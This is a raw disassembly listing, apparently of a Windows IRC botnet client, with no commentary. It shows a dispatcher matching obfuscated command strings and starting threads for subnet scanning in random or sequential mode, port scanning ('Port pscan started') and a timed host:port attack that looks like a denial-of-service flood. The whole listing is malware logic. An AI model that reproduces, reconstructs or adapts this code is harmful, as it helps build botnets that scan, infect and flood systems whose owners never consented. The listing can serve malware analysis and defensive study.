loc_410926: ; CODE XREF: sub_40A938+6001�j
call sub_429ACC
cdq
mov ecx, 0DCh
idiv ecx
add edx, 4
cmp edx, 7Fh
jz short loc_410926
push edx
push offset aD_x_x_x ; "%d.x.x.x"
lea eax, [ebp+var_2D4]
push 10h
push eax
call sub_429AEE
add esp, 10h
loc_410952: ; CODE XREF: sub_40A938+6216�j
; sub_40A938+621E�j ...
mov [ebp+var_218], 1
jmp loc_410B83
; ---------------------------------------------------------------------------
loc_410961: ; CODE XREF: sub_40A938+5FDF�j
push dword ptr [ebx+14h]
lea eax, [ebp+var_2D4]
push 10h
push eax
call sub_429AEE
push 78h
push dword ptr [ebx+14h]
call sub_42B0D0
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_218], eax
jmp loc_410B83
; ---------------------------------------------------------------------------
loc_410990: ; CODE XREF: sub_40A938+5FCF�j
cmp [ebp+arg_64], ecx
jnz short loc_4109EB
cmp [ebp+arg_54], ecx
jnz loc_410ABC
cmp [ebp+arg_58], ecx
jnz loc_410ABC
cmp [ebp+arg_5C], ecx
jnz loc_410ABC
cmp [ebp+arg_60], ecx
jnz loc_410ABC
cmp [ebp+arg_14], ecx
mov ebx, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov edi, offset aSNoIpSpecified ; "%s No IP specified."
jnz short loc_4109E3
cmp [ebp+arg_18], ecx
jnz loc_40B5A0
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
xor ecx, ecx
loc_4109E3: ; CODE XREF: sub_40A938+608E�j
cmp [ebp+arg_18], ecx
jmp loc_40B59A
; ---------------------------------------------------------------------------
loc_4109EB: ; CODE XREF: sub_40A938+605B�j
cmp [ebp+arg_54], ecx
jz short loc_4109F9
mov [ebp+arg_C], 1
jmp short loc_410A13
; ---------------------------------------------------------------------------
loc_4109F9: ; CODE XREF: sub_40A938+60B6�j
cmp [ebp+arg_58], ecx
jz short loc_410A07
mov [ebp+arg_C], 2
jmp short loc_410A13
; ---------------------------------------------------------------------------
loc_410A07: ; CODE XREF: sub_40A938+60C4�j
cmp [ebp+arg_5C], ecx
jz short loc_410A8A
mov [ebp+arg_C], 3
loc_410A13: ; CODE XREF: sub_40A938+60BF�j
; sub_40A938+60CD�j
mov ebx, offset dword_457C20
push offset byte_454A34
push ebx
call edi ; dword_437174
test eax, eax
jz short loc_410A2F
push ebx
call sub_41E3FB
test eax, eax
pop ecx
jz short loc_410A55
loc_410A2F: ; CODE XREF: sub_40A938+60EA�j
mov ecx, [ebp+arg_10]
call sub_41DA92
mov ecx, [ebp+arg_10]
push eax
call sub_41CE5F
mov edi, eax
push 2710h
push edi
call dword_43707C ; WaitForSingleObject
push edi
call dword_437044 ; CloseHandle
loc_410A55: ; CODE XREF: sub_40A938+60F5�j
push [ebp+arg_C]
mov edi, [ebp+arg_60]
push edi
push ebx
call sub_401F44
add esp, 0Ch
test eax, eax
jz loc_4148CF
push 10h
push eax
lea eax, [ebp+var_2D4]
push eax
call sub_429C40
add esp, 0Ch
mov [ebp+var_218], edi
jmp loc_410B83
; ---------------------------------------------------------------------------
loc_410A8A: ; CODE XREF: sub_40A938+60D2�j
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov ebx, offset aSNoSubnetClass ; "%s No subnet class specified."
loc_410A94: ; CODE XREF: sub_40A938+36ED�j
cmp [ebp+arg_14], ecx
jnz short loc_410AB4
cmp [ebp+arg_18], ecx
jnz loc_40D201
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
xor ecx, ecx
loc_410AB4: ; CODE XREF: sub_40A938+615F�j
cmp [ebp+arg_18], ecx
jmp loc_40D1FB
; ---------------------------------------------------------------------------
loc_410ABC: ; CODE XREF: sub_40A938+6060�j
; sub_40A938+6069�j ...
mov ecx, [ebp+arg_10]
push 10h
pop edi
lea eax, [ebp+var_5C]
push eax
lea eax, [ebp+var_6C]
push eax
mov [ebp+var_5C], edi
call sub_41DAA2
push eax
call dword_456E98 ; getsockname
xor ebx, ebx
cmp [ebp+arg_54], ebx
jz short loc_410AE9
and [ebp+var_68], 0FFh
jmp short loc_410AFE
; ---------------------------------------------------------------------------
loc_410AE9: ; CODE XREF: sub_40A938+61A6�j
cmp [ebp+arg_58], ebx
jz short loc_410AF5
and word ptr [ebp+var_68+2], 0
jmp short loc_410AFE
; ---------------------------------------------------------------------------
loc_410AF5: ; CODE XREF: sub_40A938+61B4�j
cmp [ebp+arg_5C], ebx
jz short loc_410AFE
and byte ptr [ebp+var_68+3], 0
loc_410AFE: ; CODE XREF: sub_40A938+61AF�j
; sub_40A938+61BB�j ...
push edi
push [ebp+var_68]
call dword_456FBC ; inet_ntoa
push eax
lea eax, [ebp+var_2D4]
push eax
call sub_429C40
add esp, 0Ch
cmp [ebp+arg_60], ebx
jz short loc_410B7D
xor edi, edi
cmp [ebp+arg_54], ebx
jz short loc_410B29
push 3
loc_410B26: ; CODE XREF: sub_40A938+61F8�j
pop edi
jmp short loc_410B3A
; ---------------------------------------------------------------------------
loc_410B29: ; CODE XREF: sub_40A938+61EA�j
cmp [ebp+arg_58], ebx
jz short loc_410B32
push 2
jmp short loc_410B26
; ---------------------------------------------------------------------------
loc_410B32: ; CODE XREF: sub_40A938+61F4�j
cmp [ebp+arg_5C], ebx
jz short loc_410B3A
xor edi, edi
inc edi
loc_410B3A: ; CODE XREF: sub_40A938+61EF�j
; sub_40A938+61FD�j
lea eax, [ebp+var_2D4]
push 30h
push eax
call sub_42AF90
pop ecx
xor bl, bl
test edi, edi
pop ecx
jle loc_410952
loc_410B54: ; CODE XREF: sub_40A938+623E�j
test eax, eax
jz loc_410952
mov byte ptr [eax], 78h
lea eax, [ebp+var_2D4]
push 30h
push eax
call sub_42AF90
pop ecx
inc bl
pop ecx
movsx ecx, bl
cmp ecx, edi
jl short loc_410B54
jmp loc_410952
; ---------------------------------------------------------------------------
loc_410B7D: ; CODE XREF: sub_40A938+61E3�j
mov [ebp+var_218], ebx
loc_410B83: ; CODE XREF: sub_40A938+6024�j
; sub_40A938+6053�j ...
mov eax, [ebp+arg_14]
mov ecx, [ebp+arg_10]
mov [ebp+var_224], eax
mov eax, [ebp+arg_20]
mov [ebp+var_21C], eax
mov eax, [ebp+arg_18]
mov [ebp+var_220], eax
mov [ebp+var_20C], ecx
test eax, eax
lea eax, [ebp+var_2C4]
jz short loc_410BB8
push offset dword_443EF4
jmp short loc_410BBD
; ---------------------------------------------------------------------------
loc_410BB8: ; CODE XREF: sub_40A938+6277�j
push offset dword_443EFC
loc_410BBD: ; CODE XREF: sub_40A938+627E�j
push eax
call dword_4370A4 ; lstrcpyA
cmp [ebp+var_218], 0
mov eax, offset aRandom ; "Random"
jnz short loc_410BD7
mov eax, offset aSequential ; "Sequential"
loc_410BD7: ; CODE XREF: sub_40A938+6298�j
push [ebp+var_22C]
lea ecx, [ebp+var_2D4]
mov edi, offset aSSSSDWithADela ; "%s %s %s %s:%d with a delay of %d secon"...
push [ebp+var_23C]
push [ebp+var_240]
push [ebp+var_244]
push ecx
push offset aY2lm40nv3yaP4m ; "Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1"
push eax
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push 8
call sub_4233DE
add esp, 28h
mov [ebp+var_238], eax
lea eax, [ebp+arg_0]
xor ebx, ebx
push eax
lea eax, [ebp+var_2D4]
push ebx
push eax
push offset sub_40242A
push ebx
push ebx
call dword_43717C ; CreateThread
mov ecx, [ebp+var_238]
imul ecx, 2724h
cmp eax, ebx
mov dword_46D70C[ecx], eax
jnz short loc_410C9F
loc_410C48: ; CODE XREF: sub_40A938+667B�j
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_410C7B
cmp [ebp+arg_18], 0
jnz short loc_410C85
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_410C7B: ; CODE XREF: sub_40A938+631F�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_410C85: ; CODE XREF: sub_40A938+6325�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
loc_410C8D: ; CODE XREF: sub_40A938+6529�j
; sub_40A938+951D�j
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
jmp loc_414856
; ---------------------------------------------------------------------------
loc_410C97: ; CODE XREF: sub_40A938+636D�j
push 32h
call dword_43718C ; Sleep
loc_410C9F: ; CODE XREF: sub_40A938+630E�j
cmp [ebp+var_214], ebx
jz short loc_410C97
cmp [ebp+arg_14], ebx
jnz short loc_410D08
cmp [ebp+arg_18], ebx
jnz short loc_410D13
cmp [ebp+arg_1C], ebx
jnz loc_4148CF
cmp [ebp+var_218], 0
mov eax, offset aRandom ; "Random"
jnz short loc_410CCD
mov eax, offset aSequential ; "Sequential"
loc_410CCD: ; CODE XREF: sub_40A938+638E�j
push [ebp+var_22C]
lea ecx, [ebp+var_2D4]
push [ebp+var_23C]
push [ebp+var_240]
push [ebp+var_244]
push ecx
push offset aY2lm40nv3yaP4m ; "Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1"
push eax
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 2Ch
xor ebx, ebx
loc_410D08: ; CODE XREF: sub_40A938+6372�j
cmp [ebp+arg_18], ebx
jz loc_4148CF
xor ebx, ebx
loc_410D13: ; CODE XREF: sub_40A938+6377�j
cmp [ebp+var_218], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_410D25
mov eax, offset aSequential ; "Sequential"
loc_410D25: ; CODE XREF: sub_40A938+63E6�j
push [ebp+var_22C]
lea ecx, [ebp+var_2D4]
push [ebp+var_23C]
push [ebp+var_240]
push [ebp+var_244]
push ecx
push offset aY2lm40nv3yaP4m ; "Y2LM40Nv3Ya/p4MrM1AZiAp1eUok8/eobtx1"
push eax
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 2Ch
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_410D62: ; CODE XREF: sub_40A938+5E68�j
push dword ptr [ebx]
push offset aSxytb1_eejq_ ; "SXYtb1.EEjQ."
call edi ; dword_437174
test eax, eax
jz loc_413DDC
push dword ptr [ebx]
push offset aVb1r0N_arr0 ; "vB1r0/N.Arr0"
call edi ; dword_437174
test eax, eax
jz loc_413DDC
push dword ptr [ebx]
push offset a8im6i__c829_ ; "8Im6i..C829."
call edi ; dword_437174
test eax, eax
jz loc_413DDC
push dword ptr [ebx]
push offset aTiyj208fhvn_ ; "tIYj208FHvN."
call edi ; dword_437174
test eax, eax
jz loc_413DDC
push dword ptr [ebx]
push offset a5ngN0zjh2i1 ; "5nG/N0ZJh2i1"
call edi ; dword_437174
test eax, eax
jz loc_413DDC
push dword ptr [ebx]
push offset aMdf9n0kzpx60 ; "mdf9n0kzPX60"
call edi ; dword_437174
test eax, eax
jz loc_413DDC
push dword ptr [ebx]
push offset aAtfv_jgk0x1 ; "/ATfv.jgK0X1"
call edi ; dword_437174
test eax, eax
jz loc_413DDC
push dword ptr [ebx]
push offset aFu6k10irsc1 ; "fu6k10iRsc/1"
call edi ; dword_437174
test eax, eax
jz loc_413DDC
push dword ptr [ebx]
push offset a_luua_bruje0 ; ".lUua.bruje0"
call edi ; dword_437174
test eax, eax
jnz loc_410FDB
xor edi, edi
cmp [ebx+4], edi
jz loc_410FD1
cmp [ebx+8], edi
jz loc_410FD1
cmp [ebx+0Ch], edi
jz loc_410FD1
push 9
call sub_423756
cmp eax, edi
pop ecx
mov [ebp+arg_C], eax
jle short loc_410E66
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_410E53
cmp [ebp+arg_18], 0
jnz short loc_410E5D
push eax
push ebx
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_410E53: ; CODE XREF: sub_40A938+64FD�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_410E5D: ; CODE XREF: sub_40A938+6503�j
push [ebp+arg_C]
push ebx
jmp loc_410C8D
; ---------------------------------------------------------------------------
loc_410E66: ; CODE XREF: sub_40A938+64ED�j
mov eax, [ebp+arg_20]
mov ecx, [ebp+arg_14]
mov dword_454A2C, eax
mov eax, [ebp+arg_18]
mov dword_454A30, eax
mov [ebp+var_840], eax
cmp eax, edi
mov dword_454A28, ecx
mov [ebp+var_838], ecx
lea eax, [ebp+var_95C]
jnz short loc_410E9C
push offset dword_443EFC
jmp short loc_410E9E
; ---------------------------------------------------------------------------
loc_410E9C: ; CODE XREF: sub_40A938+655B�j
push dword ptr [esi]
loc_410E9E: ; CODE XREF: sub_40A938+6562�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
mov [ebp+var_964], eax
push dword ptr [ebx+4]
call dword_456F5C ; inet_addr
mov [ebp+var_848], eax
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_85C], eax
mov ebx, [ebx+0Ch]
cmp ebx, edi
pop ecx
jnz short loc_410EDF
mov [ebp+var_858], 64h
jmp short loc_410EEC
; ---------------------------------------------------------------------------
loc_410EDF: ; CODE XREF: sub_40A938+6599�j
push ebx
call sub_42A030
pop ecx
mov [ebp+var_858], eax
loc_410EEC: ; CODE XREF: sub_40A938+65A5�j
cmp [ebp+arg_14], 0
mov ebx, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov edi, offset aSPortPscanStar ; "%s Port pscan started: %s:%d with delay"...
jnz short loc_410F2B
cmp [ebp+arg_18], 0
jnz short loc_410F31
push [ebp+var_858]
push [ebp+var_85C]
push [ebp+var_848]
call dword_456FBC ; inet_ntoa
push eax
push ebx
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_410F2B: ; CODE XREF: sub_40A938+65C2�j
cmp [ebp+arg_18], 0
jz short loc_410F59
loc_410F31: ; CODE XREF: sub_40A938+65C8�j
push [ebp+var_858]
push [ebp+var_85C]
push [ebp+var_848]
call dword_456FBC ; inet_ntoa
push eax
push ebx
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 1Ch
loc_410F59: ; CODE XREF: sub_40A938+65F7�j
push [ebp+var_858]
push [ebp+var_85C]
push [ebp+var_848]
call dword_456FBC ; inet_ntoa
push eax
push ebx
push edi
push 9
call sub_4233DE
add esp, 18h
mov [ebp+var_850], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_964]
push edi
push eax
push offset sub_407252
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_850]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jz loc_410C48
jmp short loc_410FC3
; ---------------------------------------------------------------------------
loc_410FBB: ; CODE XREF: sub_40A938+6692�j
push 32h
call dword_43718C ; Sleep
loc_410FC3: ; CODE XREF: sub_40A938+6681�j
cmp [ebp+var_834], 0
jz short loc_410FBB
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_410FD1: ; CODE XREF: sub_40A938+64C8�j
; sub_40A938+64D1�j ...
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
jmp loc_40BE4A
; ---------------------------------------------------------------------------
loc_410FDB: ; CODE XREF: sub_40A938+64BD�j
push dword ptr [ebx]
push offset aKzqshDhric_ ; "kzqSH/dhRIc."
call edi ; dword_437174
test eax, eax
jnz short loc_410FF4
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push 9
jmp loc_412A63
; ---------------------------------------------------------------------------
loc_410FF4: ; CODE XREF: sub_40A938+66AE�j
push dword ptr [ebx]
push offset aUycsBekwp0 ; "/uYcs/BEKWP0"
call edi ; dword_437174
test eax, eax
jnz loc_411120
push 0Ah
call sub_423756
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_41101E
mov ebx, offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
jmp loc_40B89E
; ---------------------------------------------------------------------------
loc_41101E: ; CODE XREF: sub_40A938+66DA�j
mov eax, [ebp+arg_14]
and dword_456574, 0
mov dword_45656C, eax
mov eax, [ebp+arg_20]
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
mov ebx, offset aSS_ ; "%s %s."
push edi
mov dword_456568, eax
mov eax, [ebp+arg_10]
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
push ebx
push 0Ah
mov dword_4564B8, eax
call sub_4233DE
add esp, 10h
mov dword_45653C, eax
lea eax, [ebp+arg_0]
push eax
xor eax, eax
push eax
push offset dword_4564B8
push offset sub_407E1C
push eax
push eax
call dword_43717C ; CreateThread
mov ecx, dword_45653C
imul ecx, 2724h
test eax, eax
mov dword_46D70C[ecx], eax
jnz short loc_4110E1
cmp [ebp+arg_14], eax
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_4110BD
cmp [ebp+arg_18], eax
jnz short loc_4110C7
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_4110BD: ; CODE XREF: sub_40A938+6762�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_4110C7: ; CODE XREF: sub_40A938+6767�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_4110D9: ; CODE XREF: sub_40A938+67B0�j
push 32h
call dword_43718C ; Sleep
loc_4110E1: ; CODE XREF: sub_40A938+6752�j
cmp dword_456574, 0
jz short loc_4110D9
cmp [ebp+arg_14], 0
jnz short loc_41110B
cmp [ebp+arg_18], 0
jnz short loc_411115
push edi
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_41110B: ; CODE XREF: sub_40A938+67B6�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_411115: ; CODE XREF: sub_40A938+67BC�j
push edi
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
jmp loc_40B035
; ---------------------------------------------------------------------------
loc_411120: ; CODE XREF: sub_40A938+66C7�j
push dword ptr [ebx]
push offset aWwfbf_0ptze_ ; "WWFBf.0ptzE."
call edi ; dword_437174
test eax, eax
jnz short loc_411139
push offset aXlpyr1anpgm0 ; "xLpyR1aNPGm0"
push 0Ah
jmp loc_412A63
; ---------------------------------------------------------------------------
loc_411139: ; CODE XREF: sub_40A938+67F3�j
push dword ptr [ebx]
push offset aFhzdv1ootfg0 ; "fhzdV1OotFg0"
call edi ; dword_437174
test eax, eax
jnz loc_41128F
push 0Bh
call sub_423756
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_411163
mov ebx, offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
jmp loc_40B89E
; ---------------------------------------------------------------------------
loc_411163: ; CODE XREF: sub_40A938+681F�j
mov eax, [ebp+arg_10]
mov [ebp+var_1A2C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_1978], eax
mov eax, [ebp+arg_20]
mov [ebp+var_197C], eax
push dword ptr [esi+0Ch]
lea eax, [ebp+var_1A28]
push eax
call sub_42A500
mov edi, offset aIhfnL6b5x ; "/iHFN/l6B5X/"
mov ebx, offset aSS_ ; "%s %s."
push edi
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push ebx
push 0Bh
call sub_4233DE
add esp, 18h
mov [ebp+var_19A8], eax
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_1A2C]
push eax
xor eax, eax
push eax
push ecx
push offset loc_40A1C0
push eax
push eax
call dword_43717C ; CreateThread
mov ecx, [ebp+var_19A8]
imul ecx, 2724h
test eax, eax
mov dword_46D70C[ecx], eax
jnz short loc_411242
cmp [ebp+arg_14], eax
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_411210
cmp [ebp+arg_18], eax
jnz short loc_41121A
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_411210: ; CODE XREF: sub_40A938+68B5�j
cmp [ebp+arg_18], 0
jz loc_412F27
loc_41121A: ; CODE XREF: sub_40A938+68BA�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
jmp loc_40FC13
; ---------------------------------------------------------------------------
loc_411237: ; CODE XREF: sub_40A938+6911�j
push 1F4h
call dword_43718C ; Sleep
loc_411242: ; CODE XREF: sub_40A938+68A5�j
cmp [ebp+var_1970], 0
jz short loc_411237
cmp [ebp+arg_14], 0
jnz short loc_41126C
cmp [ebp+arg_18], 0
jnz short loc_411276
push edi
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 14h
loc_41126C: ; CODE XREF: sub_40A938+6917�j
cmp [ebp+arg_18], 0
jz loc_412F27
loc_411276: ; CODE XREF: sub_40A938+691D�j
push edi
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push ebx
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 14h
jmp loc_412F27
; ---------------------------------------------------------------------------
loc_41128F: ; CODE XREF: sub_40A938+680C�j
push dword ptr [ebx]
push offset aUmk7x0pwyw9Qrn ; "Umk7x0PwyW9/QRn4z10ge1I1"
call edi ; dword_437174
test eax, eax
jnz short loc_4112A8
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
push 0Bh
jmp loc_412A63
; ---------------------------------------------------------------------------
loc_4112A8: ; CODE XREF: sub_40A938+6962�j
push dword ptr [ebx]
push offset a7fugu_n0u2m1 ; "7FUgU.N0U2m1"
call edi ; dword_437174
test eax, eax
jnz loc_4114D8
xor edi, edi
cmp [ebx+4], edi
jz loc_4114CE
cmp [ebx+8], edi
jz loc_4114CE
cmp [ebx+0Ch], edi
jz loc_4114CE
cmp [ebx+10h], edi
jz loc_4114CE
push 0Dh
call sub_423737
cmp eax, 32h
pop ecx
mov [ebp+arg_C], eax
jle short loc_411333
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_41131B
cmp [ebp+arg_18], 0
jnz short loc_411325
push eax
push ebx
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_41131B: ; CODE XREF: sub_40A938+69C5�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_411325: ; CODE XREF: sub_40A938+69CB�j
push [ebp+arg_C]
push ebx
loc_411329: ; CODE XREF: sub_40A938+6B7B�j
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_411333: ; CODE XREF: sub_40A938+69B5�j
mov eax, [ebp+arg_14]
mov [ebp+var_1160], eax
mov eax, [ebp+arg_18]
mov [ebp+var_1164], eax
cmp eax, edi
lea eax, [ebp+var_11F4]
jnz short loc_411354
push dword ptr [esi+0Ch]
jmp short loc_411356
; ---------------------------------------------------------------------------
loc_411354: ; CODE XREF: sub_40A938+6A15�j
push dword ptr [esi]
loc_411356: ; CODE XREF: sub_40A938+6A1A�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_1278], eax
push dword ptr [ebx+4]
lea eax, [ebp+var_1274]
push eax
call sub_429C40
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_1170], eax
push dword ptr [ebx+0Ch]
call sub_42A030
mov [ebp+var_116C], eax
push dword ptr [ebx+10h]
call sub_42A030
add esp, 18h
cmp [ebp+arg_14], 0
mov [ebp+var_1168], eax
mov edi, offset aSSDForDSecs_ ; "%s --> (%s:%d) for (%d secs)."
jnz short loc_4113E0
cmp [ebp+arg_18], 0
jnz short loc_4113E6
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_4113E0: ; CODE XREF: sub_40A938+6A75�j
cmp [ebp+arg_18], 0
jz short loc_411410
loc_4113E6: ; CODE XREF: sub_40A938+6A7B�j
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push edi
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 1Ch
loc_411410: ; CODE XREF: sub_40A938+6AAC�j
push dword ptr [ebx+0Ch]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+8]
call sub_42A030
pop ecx
push eax
push dword ptr [ebx+4]
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push edi
push 0Dh
call sub_4233DE
add esp, 18h
mov [ebp+var_1174], eax
lea eax, [ebp+arg_0]
xor edi, edi
push eax
lea eax, [ebp+var_1278]
push edi
push eax
push offset sub_4228EE
push edi
push edi
call dword_43717C ; CreateThread
mov ecx, [ebp+var_1174]
imul ecx, 2724h
cmp eax, edi
mov dword_46D70C[ecx], eax
jnz short loc_4114C0
cmp [ebp+arg_14], 0
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_4114A1
cmp [ebp+arg_18], 0
jnz short loc_4114AB
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_4114A1: ; CODE XREF: sub_40A938+6B45�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_4114AB: ; CODE XREF: sub_40A938+6B4B�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_411329
; ---------------------------------------------------------------------------
loc_4114B8: ; CODE XREF: sub_40A938+6B8F�j
push 32h
call dword_43718C ; Sleep
loc_4114C0: ; CODE XREF: sub_40A938+6B34�j
cmp [ebp+var_115C], 0
jz short loc_4114B8
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_4114CE: ; CODE XREF: sub_40A938+6986�j
; sub_40A938+698F�j ...
mov edi, offset aBjatzQyrs11 ; "BjAtz/qyRS11"
jmp loc_40BE4A
; ---------------------------------------------------------------------------
loc_4114D8: ; CODE XREF: sub_40A938+697B�j
push dword ptr [ebx]
push offset aW3dwl46o0u0 ; "w3dWL/46o0u0"
call edi ; dword_437174
test eax, eax
jnz short loc_4114EF
push offset aBjatzQyrs11 ; "BjAtz/qyRS11"
jmp loc_4127E3
; ---------------------------------------------------------------------------
loc_4114EF: ; CODE XREF: sub_40A938+6BAB�j
push dword ptr [ebx]
push offset aUbqs_hzpkh1 ; "/uBQS.HZPkh1"
call edi ; dword_437174
test eax, eax
jz loc_413BBC
push dword ptr [ebx]
push offset a6x7zf1eztny_ ; "6x7zf1EztnY."
call edi ; dword_437174
test eax, eax
jz loc_413BBC
push dword ptr [ebx]
push offset aFyflu0ji3xh_ ; "FyFlU0jI3XH."
call edi ; dword_437174
test eax, eax
jz loc_413BBC
push dword ptr [ebx]
push offset a7otcu0fic6v0 ; "7otcU0FiC6V0"
call edi ; dword_437174
test eax, eax
jz loc_413BBC
push dword ptr [ebx]
push offset aDnjyk0fwki__ ; "dnjYk0fWkI.."
call edi ; dword_437174
test eax, eax
jnz short loc_41154A
